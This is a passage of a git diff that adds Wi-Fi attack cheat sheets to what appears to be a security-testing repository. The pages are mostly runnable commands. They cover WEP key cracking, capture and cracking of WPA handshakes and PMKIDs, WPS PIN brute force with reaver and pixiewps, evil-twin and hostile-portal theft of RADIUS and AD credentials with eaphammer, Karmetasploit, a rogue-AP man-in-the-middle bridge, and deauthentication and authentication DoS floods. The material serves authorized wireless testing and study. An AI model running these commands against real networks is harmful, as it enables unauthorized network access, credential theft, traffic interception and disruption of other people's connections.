mon0 + +# fake authentication = no arp +aireplay-ng -1 0 -e AP_SSID -b $AP_MAC -h $ATTACKER_MAC mon0 + * Might need a real $ATTACKER_MAC, observe traffic using airodump + > Association successful! :-) + +# fake authentication for picky AP +# Send keep-alive packets every 10 seconds +aireplay-ng -1 6000 -o 1 -q 10 -e -a -h + +# might need to fake your MAC ADDRESS first +``` + + +### Deauthentication attack + +> Force ARP packet to be sent. + +```powershell +aireplay-ng -0 1 -a $AP_MAC -c $VICTIM_MAC mon0 + * -0 : 1 deauthentication, 0 unlimited + > Sending 64 directed DeAuth. +``` + + +### ARP Replay Attack + +Video: wifu-20.mp4 The attack listens for an ARP packet and then retransmits it back to the access point. This, in turn, causes the AP to repeat the ARP packet with a new IV. By collecting enough of these IVs Aircrack-ng can then be used to crack the WEP key. + +```powershell +aireplay-ng -3 -b $AP_MAC -h $ATTACKER_MAC mon0 + * ATTACKER_MAC if fake authentication launched + * CONNECTED_MAC if a client is associated + +# –x 1000 –n 1000 ? +# aireplay-ng -3 –x 1000 –n 1000 –b $AP_MAC -h $ATTACKER_MAC wlan0mon +# wait for ARP on the network +# alternatively you can de-auth some clients + +aircrack-ng –b +aircrack-ng -0 wep1.cap + * -0 : colored output +``` + + +## References + +* [Wireless Penetration Testing Cheat Sheet [UPDATED – 2022]](https://uceka.com/2014/05/12/wireless-penetration-testing-cheat-sheet/) +* [Aireplay 0841 Attack – Introduction](https://www.doyler.net/security-not-included/aireplay-0841-attack) \ No newline at end of file diff --git a/docs/protocols/wifi/wifi-corporate.md b/docs/protocols/wifi/wifi-corporate.md new file mode 100644 index 00000000..3bdeb343 --- /dev/null +++ b/docs/protocols/wifi/wifi-corporate.md @@ -0,0 +1,112 @@ +# Wifi - Enterprise Network + +## WPA and WPA2 EAP + +WPA EAP refers to the use of the Extensible Authentication Protocol (EAP) within the context of the Wi-Fi Protected Access (WPA) security standard for wireless networks. WPA is a suite of security protocols to secure wireless local area networks (WLANs) and is a response to the vulnerabilities of the older Wired Equivalent Privacy (WEP) standard. WPA EAP is specifically associated with the enterprise mode of WPA, which uses 802.1X authentication to provide a higher level of security compared to the personal mode of WPA, which uses a pre-shared key (PSK). + + +* [s0lst1c3/eaphammer](https://github.com/s0lst1c3/eaphammer) - Targeted evil twin attacks against WPA2-Enterprise networks. + ```ps1 + git clone https://github.com/s0lst1c3/eaphammer.git + ./kali-setup + + # generate certificates + ./eaphammer --cert-wizard + + # launch attack + ./eaphammer -i wlan0 --channel 4 --auth wpa-eap --essid CorpWifi --creds + ``` + +* [Stealing RADIUS Credentials Using EAPHammer](https://github.com/s0lst1c3/eaphammer/wiki/II.-Stealing-RADIUS-Credentials-Using-EAPHammer) + ```ps1 + ./eaphammer --bssid 1C:7E:E5:97:79:B1 --essid Example --channel 2 --interface wlan0 --auth wpa-eap --creds + ``` + +* [Stealing AD Credentials Using Hostile Portal Attacks](https://github.com/s0lst1c3/eaphammer/wiki/III.-Stealing-AD-Credentials-Using-Hostile-Portal-Attacks) + ```ps1 + ./eaphammer --interface wlan0 --bssid 1C:7E:E5:97:79:B1 --essid EvilC0rp --channel 6 --auth wpa-eap --hostile-portal + ./eaphammer --interface wlan0 --essid TotallyLegit --hw-mode n --channel 36 --auth open --hostile-portal + ``` + +* [Performing Captive Portal Attacks - Evil Twin Attacks](https://github.com/s0lst1c3/eaphammer/wiki/V.-Performing-Captive-Portal-Attacks) + ```ps1 + ./eaphammer --bssid 1C:7E:E5:97:79:B1 --essid HappyMealz --channel 149 --interface wlan0 --captive-portal + ./eaphammer --captive-portal -e guestnet -i wlan0 --portal-template rogue-cert-prompt --lhost 10.0.0.10 --payload secure.crt + ``` + + +## Rogue Access Point + +### WPA handshake + +```powershell +airmon-ng start wlan0 3 +airodump-ng -c 3 -d $ATTACKER_MAC -w airbase mon0 + +# basic fake AP +airbase-ng -c 3 -e $AP_SSID mon0 +airbase-ng -c 3 -e $AP_SSID -z 4 -W 1 mon0 +-W 1 : WEP + +# get a WPA handshake if the client connect +aircrack-ng -w /pentest/passwords/john/password.lst airbase-01.cap +``` + + +### Karmetasploit + +```powershell +# install a dhcp server +apt install dhcp3-server + +airmon-ng start wlan0 3 +airbase-ng -c 3 -P -C 60 -e $AP_MAC -v mon0 +-P: respond to all probes +ifconfig at0 up 10.0.0.1/24 + +mkdir -p /var/run/dhcpd +chown -R dhcpd:dhcpd /var/run/dhcpd +touch /var/lib/dhcp3/dhcpd.leases + +"CONF DHCP FROM VIDEO 75" > /tmp/dhcpd.conf + +touch /tmp/dhcp.log +chown -R dhcpd:dhcpd /tmp/dhcp.log +dhcpd3 -f -cf /tmp/dhcpd.conf -pf /var/run/dhcpd/pid -lf /tmp/dhcp/log at0 + +karma.rc from metasploit +# comment the first 2 lines (load sqlite) +msfconsole -r /root/karma.rc +``` + + +### Access Point MITM + +```powershell +airmon-ng start wlan0 3 +airbase-ng -c 3 -e $AP_SSID_SPOOFED mon0 + +# create a bridged interface +# apt-get install bridge-utils +brctl addbr hacker +brctl addif hacker eth0 +brctl addif hacker at0 + +# assign IP addresses +ifconfig eth0 0.0.0.0 up +ifconfig at0 0.0.0.0 up +ifconfig hacker 192.168.1.8 up + +# enable IP forwarding +echo 1 > /proc/sys/net/ipv4/ip_forward + +# mitm tools +driftnet +ettercap -G +Sniff > Unified sniffing > Hacker Interface +``` + + +## References + +* [TODO](#) \ No newline at end of file diff --git a/docs/protocols/wifi/wifi-other.md b/docs/protocols/wifi/wifi-other.md new file mode 100644 index 00000000..771efac2 --- /dev/null +++ b/docs/protocols/wifi/wifi-other.md @@ -0,0 +1,122 @@ +# Wifi - Additional Tricks and Tools + +## Additional Aircrack-NG Tools + +### Remove Wireless Headers + +```powershell +airdecap-ng -b $AP_MAC open-network.cap +* -dec.cap: stripped version of the file +``` + +### Decrypt a WEP encrypted capture file + +```powershell +airdecap-ng -w $WEP_KEY wep.cap +``` + +### Decrypt a WPA2 encrypted capture file + +```powershell +airdecap-ng -e $AP_SSID -p $WPA_PASSWORD tkip.cap +``` + +### Remote Aircrack Suite + +```powershell +airmon-ng start wlan0 3 +airserv-ng -p 1337 -c 3 -d mon0 +airodump-ng -c 3 --bssid $AP_MAC $HOST:$PORT +``` + +### Wireless Intrusion Detection System + +> Require wireless key and bssid + +```powershell +airmon-ng start wlan0 3 + +# create the at0 interface +airtun-ng -a $AP_MAC -w $WEP_KEY mon0 +# the interface will auto decrypt packets +``` + +## Wireless Reconnaissance + +> Use CSV file from airodump + +CAPR Graph + +```powershell +airgraph-ng -i wifu-01.csv -g CAPR -o wifu-capr.png +# color +- green: wpa +- yellow: wep +- red: open +- black: unknown +``` + +CPG - Client Probe Graph + +```powershell +airgraph-ng -i wifu-01.csv -g CPG -o wifu-cpg.png +``` + +## Kismet + +```powershell +kismet +[enter][enter] +[tab][close] + +# Select a source and begin a monitoring +Kismet > Add source > wlan0 > Add + +.nettxt: data +.pcapdump: wireshark format +``` + +```powershell +# giskismet: kismet inside a SQL database +> require a GPS receiver + +gpsd -n -N -D4 /dev/ttyUSB0 +-N : foreground +-D : debugging level + +# kismet will gather SSID and GPS location +giskismet -x kismet.netxml + +# generate a kml file (Google Earth) +giskismet -q "select * from wireless" -o allaps.kml +giskismet -q "select * from wireless where Encryption='WEP'" -o wepaps.kml +``` + +## Other things + +```powershell +# Find Hidden SSID +aireplay-ng -0 20 –a -c mon0 + +# Mac Filtering +macchanger –-mac wlan0mon +aireplay-ng -3 –b -h wlan0mon +# MAC CHANGER +ifconfig wlan0mon down +macchanger –-mac wlan0mon +ifconfig wlan0mon up + +# Deauth Global +aireplay-ng -0 0 -e hacklab -c FF:FF:FF:FF:FF:FF wlan0mon + +# Authentication DoS Mode +mdk3 wlan0mon a -a $AP_MAC + +# Tshark - Filter and dislay data +tshark -r Captura-02.cap -Y "eapol" 2>/dev/null +tshark -i wlan0mon -Y "wlan.fc.type_subtype==4" 2>/dev/null +tshark -r Captura-02.cap -Y "(wlan.fc.type_subtype==0x08 || wlan.fc.type_subtype==0x05 || eapol) && wlan.addr==20:34:fb:b1:c5:53" 2>/dev/null + +# Convert .cap with handshake to .hccap +aircrack-ng -J network network.cap +``` \ No newline at end of file diff --git a/docs/protocols/wifi/wifi-wep.md b/docs/protocols/wifi/wifi-wep.md new file mode 100644 index 00000000..654f99b3 --- /dev/null +++ b/docs/protocols/wifi/wifi-wep.md @@ -0,0 +1,175 @@ +# Wifi - WEP Cracking + +## Cracking WEP with a Client + +### ARP Request Replay Attack + +> Attack the ACCESS POINT + +```powershell +airmon-ng start wlan0 3 # only a particular channel : 3 +airodump-ng mon0 -c 3 --bssid $AP_MAC -w arpreplay # dump traffic + +# Fake authentication for a more reliable attack +aireplay-ng -1 0 -e $AP_SSID -b $AP_MAC -h $ATTACKER_MAC mon0 + +# ARP replay attack +aireplay-ng -3 -b $AP_MAC -h $ATTACKER_MAC mon0 + +# Deauthentication +aireplay-ng -0 1 -a $AP_MAC -c $VICTIM_MAC mon0 + +# Cracking +aircrack-ng arpreplay.cap +``` + + +### Interactive replay attack + +> Attack a client to force new packets 0841 attack, or interactive packet replay is a WEP attack that allows for packet injection when ARP replay is not available/working. + +```powershell +airmon-ng start wlan0 3 # only a particular channel : 3 +airodump-ng -c 3 --bssid $AP_MAC -w clearcap mon0 # dump traffic + +# fake authentication for a more reliable attack +aireplay-ng -1 0 -e $AP_SSID -b $AP_MAC -h $ATTACKER_MAC mon0 + +# interactive replay attack (min arp 68, max arp 86) +aireplay-ng -2 -b $AP_MAC -d FF:FF:FF:FF:FF -f 1 -m 68 -n 86 mon0 # interactive - natural selection of a packet +aireplay-ng -2 -b $AP_MAC -t 1 -c FF:FF:FF:FF:FF:FF -p 0841 mon0 # interactive - force create a packet +# Packet selection (ARP packets met the characteristics): +# - APs will always repeat packets destined to the broadcast +# - The packet will have the ToDS (To Distribution System) bit set to 1 +# answer "y" multiple times + +# cracking require ~> 250000 IVs +aircrack-ng -0 -z -n 64 clientwep-01.cap + * -z: PTW attack + * -n: number of bits in the WEP key + +# backup file with an ARP packet +aireplay-ng -2 -r replay.cap mon0 +``` + + +## Cracking WEP without a Client + +* Chopchop & Fragmentation attack => PRGA, generate more packets with weak IVs +* Need an AP configured with open system authentication + +Prerequisite: + +```powershell +# put into monitor mode on our desired channel +airmon-ng start wlan0 3 # only a particular channel : 3 +airodump-ng -c 3 --bssid $AP_MAC -w wepcrack mon0 # see no client + +# fake authentication attack with association timing (every 60s try to reassociate) +aireplay-ng -1 60 -e $AP_SSID -b $AP_MAC -h $ATTACKER_MAC mon0 # should see a client in airodump +# -1 6000 to avoid a time out. +``` + + +### Fragmentation attack + +> Goal: 1500 bytes of PRGA Atheros does not generate the correct packets unless the wireless card is set to the MAC address you are spoofing. + +```powershell +# attacker mac must be associated (fake auth) +# Press "Y" +aireplay-ng -5 -b $AP_MAC -h $ATTACKER_MAC mon0 + +# use our PRGA from the fragmentation attack to generate an ARP request +# SRC_ADDR: 192.168.1.100 +# DST_ADDR: 192.168.1.255, should not exist (broadcast address) +packetforge-ng -0 -a $AP_MAC -h $ATTACKER_MAC -l $SRC_ADDR -k $DST_ADDR -y frag.xor -w inject.cap +# -k: the destination IP i.e. in ARP, this is "Who has this IP" +# -l: the source IP i.e. in ARP, this is "Tell this IP" + +# check the packet +tcpdump -n -vvv -e -s0 -r inject.cap + +# inject our crafted packet +aireplay-ng -2 -r inject.cap mon0 + +# crack the WEP key +# Aircrack-ng will auto-update when new IVs are available +aircrack-ng -0 wepcrack + +# if 64-bit WEP is used, cracking time < 5 minutes +# switch to 128-bit keys after 600000 IVs +# use the `-f 4` after 2000000 +aircrack-ng -n 64 +``` + + +### KoreK Chopchop attack + +> Can't be used for every AP, might work when fragmentation fails Much slower than the fragmentation attack + +```powershell +# chopchop attack: -4 +# out decrypted: .cap +# out prga: .xor +# Press "Y" (choose a small packet) +aireplay-ng -4 -b $AP_MAC -h $ATTACKER_MAC mon0 + +# check the packet and find the network addresses +tcpdump -n -vvv -e -s0 -r inject.cap + +# use our PRGA from the fragmentation attack +# SRC_ADDR: 192.168.1.100 +# DST_ADDR: 192.168.1.255, should not exist (broadcast address) +packetforge-ng -0 -a $AP_MAC -h $ATTACKER_MAC -l $SRC_ADDR -k $DST_ADDR -y prga.xor -w chochop_out.cap + +# inject our crafted packet +aireplay-ng -2 -r chochop_out.cap mon0 + +# crack the WEP key +aircrack-ng -0 wepcrack +``` + + +## Bypassing WEP Shared Key Authentication SKA + +> By default, most wireless drivers will attempt open authentication first. If open authentication fails, they will proceed to try shared authentication. + +Prerequisite: + +* Authentication: Shared Key +* When Fake Authentication => `AP rejects open-system authentication` + +```powershell +# put into monitor mode on our desired channel +airmon-ng start wlan0 3 # only a particular channel : 3 +airodump-ng -c 3 --bssid $AP_MAC -w sharedkey mon0 + +# deauthentication attack on the connected client +# airodump should display SKA under the AUTH column +# PRGA file will be saved as xxxx.xor +aireplay-ng -0 1 -a $AP_MAC -c $VICTIM_MAC mon0 +# TO CHECK aireplay-ng -0 10 –a $AP_MAC -c $VICTIM_MAC mon0 + +# fake authentication attack with association timing (every 60s try to reassociate) +# should display switching to Shared Key Authentication +# If you are using a PRGA file obtained from a chopchop attack, make sure that it is at least 144 bytes long +# If you have "Part2: Association Not answering...(Step3)" -> spoof the mac address used to fake auth +aireplay-ng -1 60 -e $AP_SSID -y sharedkey.xor -b $AP_MAC -h $ATTACKER_MAC mon0 + +# ARP replay attack +aireplay-ng -3 -b $AP_MAC -h $ATTACKER_MAC mon0 + +# deauthentication attack on the connected client +# speed the ARP attack process using deauth +aireplay-ng -0 1 -a $AP_MAC -c $VICTIM_MAC mon0 +# TO CHECK: aireplay-ng –-deauth 1 –a $AP_MAC -h wlan0mon + +# crack the WEP key +aircrack-ng sharedkey.cap +``` + + +## References + +* [TODO](TODO) \ No newline at end of file diff --git a/docs/protocols/wifi/wifi-wpa.md b/docs/protocols/wifi/wifi-wpa.md new file mode 100644 index 00000000..b1b599ec --- /dev/null +++ b/docs/protocols/wifi/wifi-wpa.md @@ -0,0 +1,220 @@ +# Wifi - WPA Cracking + +## Tools + +* [aircrack-ng/aircrack-ng](https://github.com/aircrack-ng/aircrack-ng) - WiFi security auditing tools suite +* [bettercap/bettercap](https://github.com/bettercap/bettercap) + + +## WPA PSK Attack + +### Cracking WPA with John the Ripper + +```powershell +# put into monitor mode on our desired channel +airmon-ng start wlan0 3 # only a particular channel : 3 +airodump-ng -c 3 --bssid $AP_MAC -w wpajohn mon0 # see no client + +# deauthentication to get the WPA handshake (Sniffing should show the 4-way handshake) +aireplay-ng -0 1 -a $AP_MAC -c $VICTIM_MAC mon0 + +# crack without john the ripper (-b ) +aircrack-ng -0 -w /pentest/passwords/john/password.lst wpajohn-01.cap +aircrack-ng -0 -w /pentest/passwords/john/password.lst wpajohn-01.cap +aircrack-ng -w password.lst,secondlist.txt wpajohn-01.cap # multiple dicts + +# crack with john the ripper - combine mangling rules with aircrack +# rules example to add in /pentest/passwords/john/john.conf +# $[0-9]$[0-9] +# $[0-9]$[0-9]$[0-9] +john --wordlist=/pentest/wireless/aircrack-ng/test/password.lst --rules --stdout | aircrack-ng -0 -e $AP_SSID -w - /root/wpajohn + +# generate PMKs for a faster cracking - Precomputed WPA Keys Database Attack +echo wifu > essid.txt +airolib-ng test.db --import essid essid.txt +airolib-ng test.db --stats +airolib-ng test.db --import passwd /pentest/passwords/john/password.lst +airolib-ng test.db --batch +airolib-ng test.db --stats +aircrack-ng -r test.db wpajohn-01.cap +# airolib-ng test.db --clean all + +# Not in lab - Convert to hccap to use with John Jumbo +aircrack-ng .cap -J +hccap2john .hccap > +john +``` + +### Cracking WPA with coWPAtty + +> Better for PMK Rainbow table attacks + +```powershell +# put into monitor mode on our desired channel +airmon-ng start wlan0 3 # only a particular channel : 3 +airodump-ng -c 3 --bssid $AP_MAC -w wpacow mon0 # see no client + +# deauthentication to get the WPA handshake +aireplay-ng -0 1 -a $AP_MAC -c $VICTIM_MAC mon0 + +# coWPAtty dictionary mode (slow) +cowpatty -r wpacow-01.cap -f /pentest/passwords/john/password.lst -2 -s $AP_SSID + +# coWPAtty rainbow table mode (fast) +genpmk -f /pentest/passwords/john/password.lst -d wifuhashes -s $AP_SSID +cowpatty -r wpacow-01.cap -d wifuhashes -2 -s $AP_SSID +``` + +### Cracking WPA with Pyrit + +> Can use GPU + +```powershell +# put into monitor mode on our desired channel +airmon-ng start wlan0 3 # only a particular channel : 3 +airodump-ng -c 3 --bssid $AP_MAC -w wpapyrit mon0 # see no client + +# deauthentication to get the WPA handshake +aireplay-ng -0 1 -a $AP_MAC -c $VICTIM_MAC mon0 + +# clean the cap and extract only good packets +pyrit -r wpapyrit-01.cap analyze +pyrit -r wpapyrit-01.cap -o wpastripped.cap strip + +# dictionary attack - slow ++ +pyrit -r wpapyrit-01.cap -i /pentest/passwords/john/password.lst -b $AP_MAC attack_passthrough + +# pre-computed hashes attack - slow on CPU +pyrit eval # pwds in database +pyrit -i /pentest/passwords/john/password.lst import_passwords # import in the database +pyrit -e $AP_SSID create_essid +pyrit batch # generate +pyrit -r wpastripped.cap attack_db + +# gpu power attack - fast on GPU +pyrit list_cores +pyrit -i /pentest/passwords/john/password.lst import_passwords # import in the database +pyrit -e $AP_SSID create_essid +pyrit batch +pyrit -r wpastripped.cap attack_db +``` + + +### Cracking WPA with bettercap + +* Install Bettercap + ```powershell + # install and update + go get github.com/bettercap/bettercap + cd $GOPATH/src/github.com/bettercap/bettercap + make build && sudo make install + sudo bettercap -eval "caplets.update; q" + ``` + +* Scan for Wifi networks + ```ps1 + # run and recon the wifi APs + sudo bettercap -iface wlan0 + # this will set the interface in monitor mode and start channel hopping on all supported frequencies + > wifi.recon on + # we want our APs sorted by number of clients for this attack, the default sorting would be `rssi asc` + > set wifi.show.sort clients desc + # every second, clear our view and present an updated list of nearby WiFi networks + > set ticker.commands 'clear; wifi.show' + > ticker on + # use the good channel + > wifi.recon.channel 1 + ``` + +* Execute the deauth attack + ```powershell + # use the bssid of the AP + > wifi.deauth e0:xx:xx:xx:xx:xx + /path/to/cap2hccapx /root/bettercap-wifi-handshakes.pcap bettercap-wifi-handshakes.hccapx + /path/to/hashcat -m 2500 -a3 -w3 bettercap-wifi-handshakes.hccapx '?d?d?d?d?d?d?d?d' + ``` + + +## WPA WPS Attack + +```powershell +airmon-ng start wlan0 +airodump-ng mon0 + +# Install +apt-get -y install build-essential libpcap-dev aircrack-ng pixiewps +git clone https://github.com/t6x/reaver-wps-fork-t6x +apt-get install reaver + +# Reaver integrated dumping tool (can also airodump-ng) +# Wash gives information about WPS being locked or not +# Locked WPS will have less success chances +wash -i mon0 + +# Launch Reaver +reaver -i mon0 -b $AP_MAC -vv -S +reaver -i mon0 -c -b $AP_MAC -p -vv -S +reaver -i mon0 -c 6 -b 00:23:69:48:33:95 -vv + + +# Now using pixiexps, you can crack PIN offline +pixiewps -e -r -s -z -a -n +# Then, you can use the PIN with reaver to get to cleartext password +reaver -i -b -c -p + + +# Some manufacturers have implemented protections +# You can try different switches to bypass +# -L = Ignore locked state +# -N = Don't send NACK packets when errors are detected +# -d = delay X seconds between PIN attempts +# -T = set timeout period to X second (.5 means half second) +# -r = After X attemps, sleep for Y seconds +reaver -i mon0 -c 6 -b 00:23:69:48:33:95 -vv -L -N -d 15 -T .5 -r 3:15 +``` + +> Message "WARNING: Detected AP rate limiting, waiting 315 seconds before re-trying" -> AP is protected Message "WARNING: Receive timeout occured" -> AP is too far + + +## WPA PMKID Attack + +```powershell +INTERFACE=$(ifconfig | grep wlp | cut -d":" -f1) # mon0 + +# PMKID capture +# Note: Based on the noise on the wifi channel it can take some time to receive the PMKID. +# It can take a while to capture PKMID (several minutes++) +# We recommend running hcxdumptool up to 10 minutes before aborting. +# If an AP recieves our association request packet and supports sending +# sudo hcxdumptool -i wlan0mon -o outfile.pcapng --enable_status=1 +PMKID=$(sudo hcxdumptool -o test.pcapng -i $INTERFACE --enable_status --filtermode=2) +echo $PMKID|grep 'FOUND PMKID' &> /dev/null +hcxpcaptool -z test.16800 test.pcapng + +# Then convert the captured data to a suitable format for hashcat +# -E retrieve possible passwords from WiFi-traffic (additional, this list will include ESSIDs) +# -I retrieve identities from WiFi-traffic +# -U retrieve usernames from WiFi-traffic +# PMKID*MAC AP*MAC Station*ESSID +# 2582a8281bf9d4308d6f5731d0e61c61*4604ba734d4e*89acf0e761f4*ed487162465a774bfba60eb603a39f3a +hcxpcaptool -E essidlist -I identitylist -U usernamelist -z test.16800 test.pcapng + +# Cracking the HASH +hashcat -m 16800 test.16800 -a 3 -w 3 '?l?l?l?l?l?lt!' +hashcat -m 16800 -d 1 -w 3 myHashes rockyou.txt + +# Check clGetPlatformIDs(): CL_PLATFORM_NOT_FOUND_KHR +``` + +**Bettercap WPA - PMKID attack** + +```powershell +wifi.assoc all +/path/to/hcxpcaptool -z bettercap-wifi-handshakes.pmkid /root/bettercap-wifi-handshakes.pcap +/path/to/hashcat -m16800 -a3 -w3 bettercap-wifi-handshakes.pmkid '?d?d?d?d?d?d?d?d' +``` + + +## References + +* [TODO](TODO) \ No newline at end of file